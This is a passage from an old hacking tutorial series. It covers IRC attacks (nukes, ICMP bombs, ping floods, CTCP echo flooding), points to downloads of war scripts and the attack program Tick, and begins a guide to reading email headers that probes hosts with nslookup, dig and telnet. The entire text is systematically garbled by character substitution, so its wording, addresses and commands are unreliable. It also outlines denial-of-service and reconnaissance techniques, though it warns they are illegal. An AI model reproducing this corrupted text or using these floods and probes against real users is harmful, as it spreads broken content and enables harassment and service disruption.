buddy is begging you to .lease( .lease gi<e him a turn being the o.erator& ;ou may decide to hand o<er the 4+ to him or her in order to demonstrate friendshi.& But if you mess u. and accidentally 4+ a bad guy who is .retending to be someone you know and trust( your fun chat can become history& 4ne way to kee. this all this obno'ious stuff from ha..ening is to sim.ly not 4+ .eo.le you do not know& But this is easier said than done& 1t is a friendly thing to gi<e 4+ to your buddies& ;ou may not want to a..ear stuck u. by refusing to 4+ anyone& So if you are going to 4+ a friend( how can you really tell that 15/ dude is your friend?

Rust because you recogni>e the nick !nickname$( donbt assume itbs who you think it is /heck the host address associated with the nick by gi<ing the command :Iwhois 15/nick: where `15/nicka is the nickname of the .erson you want to check& #his `Iwhoisa command will gi<e back to you the email address belonging to the .erson using that nick& 1f you see( for e'am.le( `d)))Jwannabe&neta instead of the address you e'.ected( say friendJcool&com( then 24 "4# 4+ him& 6ake the .erson e'.lain who he or she is and why the email address is different& But entering a fake nick when entering an 15/ ser<er is only the sim.lest of ways someone can sabotage an 15/ session& ;our real trouble comes when .eo.le de.loy `nukesa and `1/B6sa against you& `"ukinga is also known as `1/6+ Bombing&a #his includes forged messages such as 34H !end of file$( dead socket( redirect( etc& )))))))))))))))))))))))))))))))))))))) "ewbie note: 1/6+ stands for 1nternet /ontrol 6essage +rotocol& #his is an class of 15/ attacks that go beyond e'.loiting @uirks in the 15/ ser<er .rogram to take ad<antage of ma=or league hacking techni@ues based u.on the way the 1nternet works& )))))))))))))))))))))))))))))))))))))) )))))))))))))))))))))))))))))))))))))) ;ou can go to =ail warning: 1/6+ attacks constitute illegal denial of ser<ice attacks& #hey are not =ust harmless harassment of a single .erson on 15/( but may affect an entire 1nternet host com.uter( dis.uting ser<ice to all who are using it& ))))))))))))))))))))))))))))))))))))))) Hor e'am.le( 1/6+ redirect messages are used by routers to tell other com.uters `Hey( @uit sending me that stuff& Send it to router'&foobar&net instead a So an 1/6+ redirect message could cause your 15/ messages to go to bit hea<en instead of your chat channel& 34H stands for `end of file&a `2ead socketa refers to connections such as your +++ session that you would be using with many 15/ clients to connect to the 1nternet& 1f your 15/ enemy s.oofs a message that your socket is dead( your 15/ chat session canbt get any more in.ut from you& #hatbs what the .rogram `1/6+ Host 0nreachable Bomber for Windowsa does&

+robably the most de<astating 15/ wea.on is the flood .ing( known as `1/B6 flood or 1/6+ing&a #he idea is that a bully will find out what 1nternet host you are using( and then gi<e the command `.ing?fa to your host com.uter& 4r e<en to your home com.uter& ;es( on 15/ it is .ossible to identify the dynamically assigned 1+ address of your home com.uter and send stuff directly to your modem 1f the bully has a decent com.uter( he or she may be able to .ing yours badly enough to briefly knock you out of 15/& #hen this character can take o<er your 15/ session and may mas@uerade as you& )))))))))))))))))))))) "ewbie note: When you connect to the 1nternet with a .oint?to?.oint !+++$ connection( your 1S+bs host com.uter assigns you an 1nternet +rotocol !1+$ address which may be different e<ery time you log on& #his is called a `dynamically assigned 1+ address&a 1n some cases( howe<er( the 1S+ has arranged to assign the uses the same 1+ address each time& )))))))))))))))))))))) "ow letbs consider in more detail the <arious ty.es of flooding attacks on 15/& #he .ur.ose of flooding is to send so much garbage to a client that its connection to the 15/ ser<er either becomes useless or gets cut off& #e't flooding is the sim.lest attack& Hor e'am.le( you could =ust hold down the `'a key and hit enter from time to time& #his would kee. the 15/ screen filled with your =unk and scroll the othersb comments @uickly off the screen& Howe<er( te't flooding is almost always unsuccessful because almost any 15/ client !the .rogram you run on your com.uter$ has te't flood control& 3<en if it doesnbt( te't must .ass through an 15/ ser<er& 6ost 15/ ser<ers also ha<e te't flood filters& Because te't flooding is basically harmless( you are unlikely to suffer anything worse than getting banned or .ossibly 8:lined for doing it& )))))))))))))))))))))))))))))))))))))))))) "ewbie note: `8:linea means to ban not =ust you( but anyone who is in your domain from an 15/ ser<er& Hor e'am.le( if you are a student at Giant State 0ni<ersity with an email address of 15/dMMdJgiantstate&edu( then e<ery .erson whose email address ends with `giantstate&edua will also be banned&

))))))))))))))))))))))))))))))))))))))))))) /lient to /lient +rotocol !/#/+$ echo flooding is the most effecti<e ty.e of flood& #his is sort of like the .ing you send to determine whether a host com.uter is ali<e& 1t is a command used within 15/ to check to see if someone is still on your 15/ channel& How does the echo command work? #o check whether someone is still on your 15/ channel( gi<e the command `Ictc. nick 3/H4 hello out there a 1f `nicka !where `nicka is the 15/ nickname of the .erson you are checking out$ is still there( you get back `nick H3774 40# #H353&a What has ha..ened is that your <ictimbs 15/ client .rogram has automatically echoed whate<er message you sent& But someone who wants to boot you off 15/ can use the /#/+ echo command to trick your 15/ ser<er into thinking you are hogging the channel with too much talking& #his is because most 15/ ser<ers will automatically cut you off if you try te't flooding& So /#/+ echo flooding s.oofs the 15/ into falsely cutting someone off by causing the <ictimbs 15/ client to automatically kee. on res.onding to a whole bunch of echo re@uests& 4f course your attacker could also get booted off for making all those /#/+ echo re@uests& But a knowledgeable attacker will either be working in league with some friends who will be doing the same thing to you or else be connected with se<eral different nicks to that same 15/ ser<er& So by ha<ing different <ersions of him or herself in the form of software bots making those /#/+ echo re@uests( the attacker stays on while the <ictim gets booted off& #his attack is also fairly harmless( so .eo.le who get caught doing this will only get banned or maybe 8:lined for their misbeha<ior& )))))))))))))))))))))))))))))) "ewbie note: * `bota is a com.uter .rogram that acts kind of like a robot to go around and do things for you& Some bots are hard to tell from real .eo.le& Hor e'am.le( some 15/ bots wait for someone to use bad language and res.ond to these naughty words in annoying ways& )))))))))))))))))))))))))))))))))))))

))))))))))))))))))))))))))))))))))))) ;ou can get .unched in the nose warning: Bots are not .ermitted on the ser<ers of the large networks& #he 15/ /o.s who control hacker wars on these networks lo<e nothing more than killing bots and banning the botrunners that they catch& )))))))))))))))))))))))))))))))))))))) * similar attack is /*#/H .ing& ;ou can gi<e the command `I.ing nicka and the 15/ client of the guy using that nick would res.ond to the 15/ ser<er with a message to be .assed on to the guy who made the .ing re@uest saying `nicka is ali<e( and telling you how long it took for nickbs 15/ client .rogram to res.ond& 1tbs useful to know the res.onse time because sometimes the 1nternet can be so slow it might take ten seconds or more to send an 15/ message to other .eo.le on that 15/ channel& So if someone seems to be taking a long time to re.ly to you( it may =ust be a slow 1nternet& ;our attacker can also easily get the dynamically assigned 1+ !1nternet .rotocol$ address of your home com.uter and directly flood your modem& But =ust about e<ery 0ni' 15/ .rogram has at least some /*#/H flood .rotection in it& *gain( we are looking at a fairly harmless kind of attack& So how do you handle 15/ attacks? #here are se<eral .rograms that you can run with your 0ni' 15/ .rogram& 3'am.les are the .rograms 7i/e and +hoeni'& #hese scri.ts will run in the background of your 0ni' 15/ session and will automatically kick in some sort of .rotection !ignore( ban( kick$ against attackers& 1f you are running a Windows?based 15/ client( you may assume that like usual you are out of luck& 1n fact( when 1 first got on an 15/ channel recently using "etsca.e %&M, running on Win 95( the )first) thing the deni>ens of 9hackers did was make fun of my o.erating system& ;eah( thanks& But in fact there are great 15/ war .rograms for both Windows 95 and 0ni'& Hor Windows 95 you may wish to use the m15/ client .rogram& ;ou can download it from htt.:IIwww&su.er?highway&netIusersIgo<ilImircGM&html& 1t includes .rotection from 1/6+ .ing flood& But this .rogram isnbt enough to handle all the 15/ wars you may encounter& So you may wish to add the .rotection of the most user?friendly( .owerful Windows 95 war scri.t around: Kth S.here& ;ou can get it from htt.:IIwww&localnet&comI]marcra>I&

1f you surf 15/ from a 0ni' bo'( youbll want to try out 15/11& ;ou can download it from ft.&undernet&org ( in the directory I.ubIircIclientsIuni'( or htt.:IIwww&irchel.&orgI( or ft.:IIcs?ft.&bu&eduIircI& Hor added .rotection( you may download 7i/e from ft.:IIft.&cibola&netI.ubIircIscri.ts& *hem( at this same site you can also download the attack .rogram #ick from I.ubIircItick& But if you get #ick( =ust remember our `;ou can get .unched in the nosea warning ))))))))))))))))))))))))))))))))) "ewbie note: Hor detailed instructions on how to run these 15/ .rograms( see *t htt.:IIwww&irchel.&orgI& 4r go to 0senet and check out alt&irc&@uestions ))))))))))))))))))))))))))))))))) ))))))))))))))))))))))))))))))))) 3<il genius ti.: Want to know e<ery e'cruciating technical detail about 15/? /heck out 5H/ ,G59 !#he 15/ .rotocol$& ;ou can find many co.ies of this e<er .o.ular 5H/ !5e@uest for /omments$ by doing a Web search& )))))))))))))))))))))))))))))))) "ow letbs su..ose you are all set u. with an industrial strength 15/ client .rogram and war scri.ts& 2oes this mean you are ready to go to war on 15/? 0s Ha..y Hacker folks donbt recommend attacking .eo.le who take o<er 4+ status by force on 15/& 3<en if the other guys start it( remember this& 1f they were able to sneak into the channel and get 4+s =ust like that( then chances are they are much more e'.erienced and dangerous than you are& 0ntil you become an 15/ master yourself( we suggest you do no more than ask .olitely for 4+s back& Better yet( :Iignore nick: the lMM>er and =oin another channel& Hor instance( if 9e<ilha'orchat is taken o<er( =ust create 9e<ilha'orchat- and :Iin<ite 15/friend: all your friends there& *nd remember to use what you learned in this Guide about the 15/ whois command so that you 24"b# 4+ .eo.le unless you know who they are& *s +atrick 5utledge says( this might sound like a wim. mo<e( but if you don't ha<e a fighting chance( don't try ? it might be more embarrassing for you in the long run& *nd if you start 15/ warrioring and get 8:lined off the system( =ust think about that .ur.le nose and black eye you could get when all the other 15/ dudes at your 1S+ or school find out who was the luser who got e<eryone banned&

#hatbs it for now& "ow donbt try any funny stuff( 48? 4h( no( theybre nuking meee&&& FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF G0123 #4 !mostly$ H*5673SS H*/81"G Col % "umber G How to 5ead 3mail Headers and Hind 1nternet Hosts Warning: flamebait enclosed FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 48( 48( you %,%%K ha'ors win& 1bm finally releasing the ne't in our series of Guides oriented toward the intermediate hacker& "ow some of you may think that headers are too sim.le or boring to waste time on& Howe<er( a few weeks ago 1 asked the %MMMX readers of the Ha..y Hacker list if anyone could tell me e'actly what email tricks 1 was .laying in the .rocess of mailing out the 2igests& But not one .erson re.lied with a com.lete answer ?? or e<en K5P of the answer ?? or e<en sus.ected that for months almost all Ha..y Hacker mailings ha<e doubled as .rotests& #he targets: 1S+s offering download sites for email bomber .rograms& /onclusion: it is time to talk headers 1n this Guide we will learn: L what is a header L why headers are fun L how to see full headers L what all that stuff in your headers means L how to get the names of 1nternet host com.uters from your headers L the foundation for understanding the forging of email and 0senet .osts( catching the .eo.le who forge headers( and the theory behind those email bomber .rograms that can bring an entire 1nternet Ser<ice +ro<ider !1S+$ to its knees

#his is a Guide you can make at least some use of without getting a shell account or installing some form of 0ni' on your home com.uter& *ll you need is to be able to send and recei<e email( and you are in business& Howe<er( if you do ha<e a shell account( you can do much more with deci.hering headers& Ci<a 0ni' Headers may sound like a boring to.ic& Heck( the 3udora email .rogram named the button you click to read full headers `blah blah blah&a But all those guys who tell you headers are boring are either ignorant ?? or else afraid youbll o.en a wonderful chest full of hacker insights& ;es( e<ery email header you check out has the .otential to unearth a treasure hidden in some back alley of the 1nternet& "ow headers may seem sim.le enough to be a to.ic for one of our Beginnersb Series Guides& But when 1 went to look u. the to.ic of headers in my library of manuals( 1 was shocked to find that most of them donbt e<en co<er the to.ic& #he two 1 found that did co<er headers said almost nothing about them& 3<en the rele<ant 5H/ D-- is .retty <ague& 1f any of you su.er?<igilant readers looking for flame bait ha..en to know of any literature that )does) co<er headers in detail( .lease include that information in your tirades ))))))))))))))))))))))))))))))))))))))))))))) #echnical ti.: 1nformation rele<ant to headers may be e'tracted from 5e@uests for /omments !5H/s$ D-- !best$( as well as ,MG-( ,,-%( ,5-, and ,D9, !not a com.lete list$& #o read them( take your Web browser to htt.:IIalta<ista&digital&com and search for `5H/ D--a etc& ))))))))))))))))))))))))))))))))))))))))))))) 7acking much hel. from manuals( and finding that 5H/ D-- didnbt answer all my @uestions( the main way 1 researched this article was to send email back and forth among some of my accounts( trying out many <ariations in order to see what kinds of headers they generated& Hey( thatbs how real hackers are su..osed to figure out stuff when 5#H6 !read the fine manual$ or 5#H5H/ !read the fine 5H/$doesnbt tell us as much as we want to know& 5ight? 4ne last thing& +eo.le ha<e .ointed out to me that e<ery time 1 .ut an email address or domain name in a Guide to !mostly$ Harmless Hacking( a >illion newbies launch botched hacking attacks against these& *ll email addresses and domain names below ha<e been fubarred& ))))))))))))))))))))))))))))))))))))))))))))))))

"ewbie note: #he <erb `to fubara means to obscure email addresses and 1nternet host addresses by changing them& *ncient tradition holds that it is best to do so by substituting `foobara or `fubara for .art of the address& )))))))))))))))))))))))))))))))))))))))))))))))) WH*# *53 H3*235S? 1f you are new to hacking( the headers you are used to seeing may be incom.lete& /hances are that when you get email it looks something like this: Hrom: Cegbar Hubar ^foohaJifi&foobar&noV 2ate: Hri( ,, *.r ,99K ,D:M9:5% G6# #o: hackerJtechbroker&com But if you know the right command( suddenly( with this same email message( we are looking at tons and tons of stuff: 5ecei<ed: by o-MM&fooway&net !95MG,%&SG1&D&E&,-I95,-,,&SG1$ for techbrJfooway&net id 4**MK-,MA Hri( ,, *.r ,99K ,G:,M:ME ?MGMM 5ecei<ed: from ifi&foobar&no by o-MM&fooway&net <ia 3S6#+ !95MG,%&SG1&D&E&,-I95,-,,&SG1$ for ^hackerJtechbroker&comV id 4**,D9EKA Hri( ,, *.r ,99K ,G:M9:5D ?MGMM 5ecei<ed: from gyllir&ifi&foobar&no !--%GJgyllir&ifi&foobar&no Y,-9&'''&EG&-%MZ$ by ifi&foobar&no with 3S6#+ !D&E&,,Iifi-&G$ id ^0**-G%5,Jifi&foobar&noV for ^hackerJtechbroker&comV A Hri( ,, *.r ,99K -M:M9:5E XM-MM Hrom: Cegbar Hubar ^foohaJifi&foobar&noV 5ecei<ed: from localhost !CegbarhaJlocalhost$ by gyllir&ifi&foobar&no A Hri( ,, *.r ,99K ,D:M9:5% G6# 2ate: Hri( ,, *.r ,99K ,D:M9:5% G6# 6essage?1d: ^,99KMG,,,DM9&,%,5E&gyllirJifi&foobar&noV #o: hackerJtechbroker&com Hey( ha<e you e<er wondered why all that stuff is there and what it means? Webll return to this e'am.le later in this tutorial& But first we must consider the burning @uestion of the day: WH; *53 H3*235S H0"?

Why bother with those `blah blah blaha headers? #hey are boring( right? Wrong ,$ 3<er hear a wannabe hacker com.laining he or she doesnbt ha<e the addresses of any good com.uters to e'.lore? Ha<e you e<er used one of those 1+ scanner .rograms that find <alid 1nternet +rotocol addresses of 1nternet hosts for you? Well( you can find ga>illions of <alid addresses without the crutch of one of these .rograms sim.ly by reading the headers of emails& -$ 3<er wonder who really mailed that `6ake 6oney Hasta s.am? 4r who is that klut> who email bombed you? #he first ste. to learning how to s.ot email forgeries and s.ot the cul.rit is to be able to read headers& %$ Want to learn how to con<incingly forge email? 2o you as.ire to write automatic s.am or email bomber .rograms? !1 disa..ro<e of s.ammer and email bomb .rograms( but letbs be honest about the kinds of knowledge their creators must draw u.on&$ #he first ste. is to understand headers& G$ Want to attack someonebs com.uter? Hind out where best to attack from the headers of their email& 1 disa..ro<e of this use( too& But 1bm dedicated to telling you the truth about hacking( so like it or not( here it is& H4W /*" ;40 S33 H077 H3*235S? So you look at the headers of your email and it doesnbt a..ear ha<e any good stuff whatsoe<er& Want to see all the hidden stuff? #he way you do this de.ends on what email .rogram you are using& #he most .o.ular email .rogram today is 3udora& #o see full headers in 3udora( =ust click the `blah( blah( blaha button on the far left end of the tool bar& #he "etsca.e web browser includes an email reader& #o see full headers( click on 4.tions( then click the `Show *ll Headersa item& Sorry( 1 ha<enbt looked into how to do that with 1nternet 3'.lorer& 4h( no( 1 can see the flames coming( how dare 1 not learn the ins and outs of 13 mail But( seriously( 13 is a dangerously insecure Web browser because it is actually a Windows shell& So no matter how often 6icrosoft .atches its

security flaws( chances are you will be hurt by it one of these days& Rust say `noa to 13& *nother .o.ular email .rogram is +egasus& 6aybe there is an easy way to see full headers in +egasus( but 1 ha<enbt found it& #he hard way to see full headers in +egasus ?? or 13 ?? or any email .rogram ?? is to o.en your mail folders with Word.ad& 1t is included in the Windows 95 o.erating system and is the best Windows editing .rogram 1 ha<e found for handling documents with lots of embedded control characters and other oddities& #he /om.user<e %&M, email .rogram automatically shows full headers& Bra<o( /om.user<e +ine is the most .o.ular email .rogram used with 0ni' shell accounts& Since in order to be a real hacker you will sooner or later be using 0ni'( now may be a great time to start using +ine& ))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: +ine stands for +ine 1s "ot 3lm( a tribute to the really( truly ancient 3lm email .rogram !which is still in use$& Both +ine and 3lm date back to *5+*net( the 0S 2efense *d<anced 5esearch +ro=ects *gency com.uter network that e<entually mutated into todaybs 1nternet& 48( 48( that was a =oke& *ccording to the official blurb( `+1"3 is the 0ni<ersity of Washington's d+rogram for 1nternet "ews and 3mailb&a ))))))))))))))))))))))))))))))))))))))))))))))))) 1f you ha<e ne<er used +ine before( you may find it isnbt as easy to use as those glit>y Windows email .rograms& But aside from its ama>ing .owers( there is a really good reason to learn to com.ose email in +ine: you get .ractice using .ico editor commands& 1f you want to be a real hacker( you will be using the .ico editor !or another editor that uses similar commands$ someday when you are writing .rograms in a 0ni' shell& #o bring u. +ine( at the cursor in your 0ni' shell sim.ly ty.e in `.ine&a 1n +ine( while <iewing an email message( you may be able to see full headers by sim.ly hitting the `ha key& 1f this doesnbt work( you will ha<e to go into the Setu. menu to enable this command& #o do this( go to the main menu and gi<e the command `sa for Setu.& #hen in the Setu. menu choose `ca for

/onfig& 4n the second .age of the /onfig menu you will see something like this: +1"3 %&9, S3#0+ /4"H1G05*#14" Holder: 1"B4U - 6essages Y Z com.ose?re=ects?un@ualified?addrs Y Z com.ose?sets?newsgrou.?without?confirm Y Z delete?ski.s?deleted Y Z enable?aggregate?command?set Y Z enable?alternate?editor?cmd Y Z enable?alternate?editor?im.licitly Y Z enable?bounce?cmd Y Z enable?flag?cmd YUZ enable?full?header?cmd Y Z enable?incoming?folders Y Z enable?=um.?shortcut Y Z enable?mail?check?cue Y Z enable?sus.end Y Z enable?tab?com.letion Y Z enable?uni'?.i.e?cmd Y Z e'.anded?<iew?of?addressbooks Y Z e'.anded?<iew?of?folders Y Z e'.unge?without?confirm Y Z include?attachments?in?re.ly ? Hel. 3 3'it /onfig + +re< ? +re<+age U YSetI0nsetZ " "e't S.c "e't+age W Where1s

;ou first highlight the line that says `enable?full?header?commanda and then .ress the `'a key& #he gi<e `ea to e'it sa<ing the change& 4nce you ha<e done this( when you are reading your email you will be able to see full headers by gi<ing the `ha command& 3lm is another 0ni' email reading .rogram& 1t actually gi<es slightly more detailed headers than +ine( and automatically shows full headers& WH*# 243S *77 #H*# S#0HH 1" ;405 H3*235S 63*"? Webll start by taking a look at a mildly interesting full header& #hen webll e'amine two headers that re<eal some interesting shenanigans& Hinally we will look at a forged header&

48( let us return to that fairly ordinary full header we looked at abo<e& We will deci.her it .iece by .iece& Hirst we look at the sim.le <ersion: Hrom: Cegbar Hubar ^foohaJifi&foobar&noV 2ate: Hri( ,, *.r ,99K ,D:M9:5% G6# #o: hackerJtechbroker&com #he information within any header consists of a series of fields se.arated from each other by a `newlinea character& 3ach field consists of two .arts: a field name( which includes no s.aces and is terminated by a colonA and the contents of the field& 1n this case the only fields that show are `Hrom:(a `2ate:(a and `#o:a& 1n e<ery header there are two classes of fields: the `en<elo.e(a which contains only the sender and reci.ient fieldsA and e<erything else( which is information s.ecific to the handling of the message& 1n this case the only field that shows which gi<es information on the handling of the message is the 2ate field& When we e'.and to a full header( we are able to see all the fields of the header& We will now go through this information line by line& 5ecei<ed: by o-MM&fooway&net !95MG,%&SG1&D&E&,-I95,-,,&SG1$for techbrJfooway&net id 4**MK-,MA Hri( ,, *.r ,99K ,G:,M:ME ?MGMM #his line tells us that 1 downloaded this email from the +4+ ser<er at a com.uter named o-MM&fooway&net& #his was done on behalf of my account with email address of techbrJfooway&net& #he !95MG,%&SG1&D&E&,-I95,-,,&SG1$ .art identifies the software name and <ersion running that +4+ ser<er& )))))))))))))))))))))))))))))))))))))))))))) "ewbie note: +4+ stands for +ost 4ffice +rotocol& ;our +4+ ser<er is the com.uter that holds your email until you want to read it& 0sually your the email .rogram on your home com.uter or shell account com.uter will connect to .ort ,,M on your +4+ ser<er to get your email& * similar( but more general .rotocol is 16*+( for 1nteracti<e 6ail *ccess +rotocol& #rust me( you will be a big hit at .arties if you can hold forth on the differences between +4+ and 16*+( you big hunk of a hacker( you !Hint: for more info( 5#H5H/s&$

)))))))))))))))))))))))))))))))))))))))))))) "ow we e'amine the second line of the header: 5ecei<ed: from ifi&foobar&no by o-MM&fooway&net <ia 3S6#+ !95MG,%&SG1&D&E&,-I95,-,,&SG1$for ^hackerJtechbroker&comV id 4**,D9EKA Hri( ,, *.r ,99K ,G:M9:5D ?MGMM Well( gee( 1 didnbt .romise that this header would be )totally) ordinary& #his line tells us that a com.uter named ifi&foobar&no .assed this email to the +4+ ser<er on o-MM&fooway&net for someone with the email address of hackerJtechbroker&com& #his is because 1 am .i.ing all email to hackerJtechbroker&com into the account techbrJfooway&net& 0nder 0ni' this is done by setting u. a file in your home directory named `&forwarda with the address to which you want your email sent& "ow there is a lot more behind this( but 1bm not telling you& Heh( heh& /an any of you e<il geniuses out there figure out the whole story? `3S6#+a stands for `e'tended sim.le mail transfer .rotocol&a #he `95MG,%&SG1&D&E&,-I95,-,,&SG1a designates the .rogram that is handling my email& "ow for the ne't line in the header: 5ecei<ed: from gyllir&ifi&foobar&no !--%GJgyllir&ifi&foobar&no Y,-9&'''&EG&-%MZ$ by ifi&foobar&no with 3S6#+ !D&E&,,Iifi-&G$ id ^0**-G%5,Jifi&foobar&noV for ^hackerJtechbroker&comV A Hri( ,, *.r ,99K -M:M9:5E XM-MM #his line tells us that the com.uter ifi&foobar&no got this email message from the com.uter gyllir&ifi&foobar&no& #hese two com.uters a..ear to be on the same 7*"& 1n fact( note something interesting& #he com.uter name gyllir&ifi&foobar&no has a number after it( ,-9&'''&EG&-%M& #his is the numerical re.resentation of its name& !1 substituted `&'''&a for three numbers in order to fubar the 1+ address&$ But the com.uter ifi&foobar&no didnbt ha<e a number after its name& How come? "ow if you are working with Windows 95 or a 6ac you .robably canbt figure out this little mystery& But trust me( hacking is all about noticing these little mysteries and .robing them !until you find something to break( muhahaha ?? only kidding( 48?$

But since 1 am trying to be a real hacker( 1 go to my trusty 0ni' shell account and gi<e the command: Vnslooku. ifi&foobar&no Ser<er: Hubarino&com *ddress: ,9D&E&K,&,M "on?authoritati<e answer: "ame: ifi&foobar&no *ddress: ,-9&'''&EG&"otice the different numerical 1+ addresses between ifi&foobar&no and gyllir&ifi&foobar&no& Hmmm( 1 begin to think that the domain ifi&foobar&no may be a .retty big deal& +robing around with dig and traceroute leads me to disco<er lots more com.uters in that domain& +robing with nslooku. in the mode `set ty.eWanya tells me yet more& Say( what does that `&noa mean( anyhow? * @uick look at the 1nternational Standards 4rgani>ation !1S4$ records of country abbre<iations( 1 see `noa stands for "orway& *ha( it looks like "orway is an arctic land of f=ords( mountains( reindeer( and lots and lots of 1nternet hosts& * @uick search of the mailing list for Ha..y Hacker re<eals that some 5P of its almost G(MMM email addresses ha<e the &no domain& So now we know that this land of the midnight sun is also a hotbed of hackers Who said headers are boring? 4n to the ne't line( which has the name and email address of the sender: Hrom: Cegbar Hubar ^foohaJifi&foobar&noV 5ecei<ed: from localhost !CegbarhaJlocalhost$ by gyllir&ifi&foobar&no A Hri( ,, *.r ,99K ,D:M9:5% G6# 1bm going to do some guessing here& #his line says the com.uter gyllir&ifi&foobar&no got this email message from Cegbar Hubar on the com.uter `localhost&a "ow `localhosta is what a 0ni' com.uter calls itself& While in a 0ni' shell( try the command `telnet localhost&a ;oubll get a login se@uence that gets you right back into your own account& So when 1 see that gyllir&ifi&foobar&no got the email message from `localhosta 1 assume that means the sender of this email was logged into a shell account

on gyllir&ifi&foobar&no( and that this com.uter runs 0ni'& 1 @uickly test this hy.othesis: V telnet gyllir&ifi&foobar&no #rying ,-9&'''&EG&-%M&&& /onnected to gyllir&ifi&foobar&no& 3sca.e character is 'BZ'& 151U System C&G !gyllir&ifi&foobar&no$ "ow 1ri' is a 0ni'?ty.e o.erating system for Silicon Gra.hics 1nc& !SG1$ machines& #his fits with the name of the +4+ ser<er software on ifi&foobar&no in the header of !95MG,%&SG1&D&E&,-I95,-,,&SG1$& So( wow( we are looking at a large network of "orwegian com.uters that includes SG1 bo'es& We could find out =ust how many SG1 bo'es with .atience( scanning of neighboring 1+ addresses( and use of the 0ni' dig and nslooku. commands& "ow you donbt see SG1 bo'es =ust e<ery day on the 1nternet& SG1 com.uters are o.timi>ed for gra.hics and scientific com.uting& So 1bm really tem.ted to learn more about this domain& 4ftentimes an 1S+ will ha<e a Web .age that is found by directing your browser to its domain name& So 1 try out htt.:IIifi&foobar&no& 1t doesnbt work( so 1 try htt.:IIwww&ifi&foobar&no& 1 get the home .age for the 0ni<ersity of 4slo 1nstitutt for 1nformatikk& #he 1nformatikk di<ision has strengths in com.uter science and image .rocessing& "ow wonder .eo.le with ifi&foobar&no get to use SG1 com.uters& "e't 1 check out www&foobar&no and learn the 0ni<ersity of 4slo has some %9(MMM students& "o wonder we find so many 1nternet host com.uters under the ifi&foobar&no domain But letbs get back to this header& #he ne't line is .retty sim.le( =ust the date: 2ate: Hri( ,, *.r ,99K ,D:M9:5% G6# But now comes the most fascinating line of all in the header( the message 12: 6essage?1d: ^,99KMG,,,DM9&,%,5E&gyllirJifi&foobar&noV

#he message 12 is the key to tracking down forged email& *<oiding the creation of a <alid message 12 is the key to using email for criminal .ur.oses& /om.uter criminals go to a great deal of effort to find 1nternet hosts on which to forge email that will lea<e no trace of their acti<ities through these message 12s& #he first .art of this 12 is the date and time& ,99KMG,,,DM9 means ,99K( *.ril ,,( ,D:MD !or E:MD +6$& Some message 12s also include the time in seconds& 4thers may lea<e out the `,9a from the year& #he ,%,5E is a number identifying who wrote the email( and gyllirJifi&foobar&no refers to the com.uter( gyllir within the domain ifi&foobar&no( on which this record is stored& Where on this com.uter are the records of the identities of senders of email stored? "ow 0ni' has many <ariants( so 1bm not going to .romise these records will be in a file of the same name in e<ery 0ni' bo'& But often they will be in either the syslog files or usrIs.oolIm@ueue& Some sysadmins will archi<e the message 12s in case they need to find out who may ha<e been abusing their email system& But the default setting for some systems( for e'am.le those using sendmail( is to not archi<e& 0nfortunately( an 1nternet host that doesnbt archi<e these message 12s is creating a .otential ha<en for email criminals& "ow we will lea<e the 0ni<ersity of "orway and mo<e on to a header that hides a sur.rise& 5ecei<ed: from "1H-W**H !mailE&foo,&csi&com Y,G9&'''&,D%&K5Z$ by Hubarino&com !D&D&%ID&E&9$ with 3S6#+ id U**-MD5G for ^galfinaJHubarino&comVA Sun( -K *.r ,99K -%:MK:M, G6# 5ecei<ed: from /1S+++ ? ,99&'''&,9%&,KE by csi&com with 6icrosoft S6#+SC/A Sun( -K *.r ,99K --:5%:%E ?MGMM 6essage?1d: ^-&-&,E&,99KMG-DMD-,%-&-cdf5GGeJfubar&comV U?Sender: cmeinelJfubar&com U?6ailer: Windows 3udora +ro Cersion -&- !,E$ 6ime?Cersion: ,&M /ontent?#y.e: te'tI.lainA charsetW:us?ascii: #o: galfinaJHubarino&com Hrom: :/arolyn +& 6einel: ^cmeinelJtechbroker&comV Sub=ect: Sam.le header 2ate: -K *.r ,99K --:5%:%K ?MGMM

7etbs look at the first line: 5ecei<ed: from "1H-W**H !mailE&foo,&csi&com Y,G9&'''&,D%&K5Z$ by Hubarino&com !D&D&%ID&E&9$ with 3S6#+ id U**-MD5G for ^galfinaJHubarino&comVA Sun( -K *.r ,99K -%:MK:M, G6# #his first line tells us that it was recei<ed by the email account `galfinaJHubarino&coma& #hatbs the `for ^galfinaJHubarino&comV` .art& #he 1nternet host com.uter that sent the email to galfina was mailE&foo,&csi&com Y,G9&'''&,D%&K5Z& #his com.uter name is gi<en first in a form easily !ha( hah $ read by humans followed by the <ersion of its name that a com.uter can more easily translate into the Mbs and ,bs that com.uters understand& `Galfinaa is my user name& 1 chose it in order to irritate G&*&7&H& !Gray *reas 7iberation Hront$& `Hubarino&com !D&D&%ID&E&9$a is the name of the com.uter that recei<ed the email for my galfina account& But notice it is a <ery .artial com.uter name& *ll we get is a domain name and not the name of the com.uter from which 1 download my email& We can guess that Hubarino&com is not the full name because Hubarino is a big enough 1S+ to ha<e se<eral com.uters on a 7*" to ser<e all its users& )))))))))))))))))))))))))))))))))))))))))))))))))) 3<il genius ti.: Want to find out the names of some of the com.uters on your 1S+bs 7*"? /ommands that can dredge some of them u. include the 0ni' commands traceroute( dig( and who& Hor e'am.le( 1 e'.lored the Hubarino&com 7*" and found free&Hubarino&com !from command `dig Hubarino&coma$A and then dialin&Hubarino&com and milnet&Hubarino&com !from `whoa gi<en while logged in my galfina account$ #hen using the numerical addresses gi<en from the dig command with these names of Hubarino&com com.uters 1 then was able( by checking nearby numbers( to find a whole bunch more names of Hubarino&com com.uters& )))))))))))))))))))))))))))))))))))))))))))))))))) #he number after Hubarino&com is not a numerical 1+ address& 1t is the designation of the <ersion of the mail .rogram it runs& We can guess from these numbers D&D&%ID&E&9 that it refers to the Sendmail .rogram& But =ust to

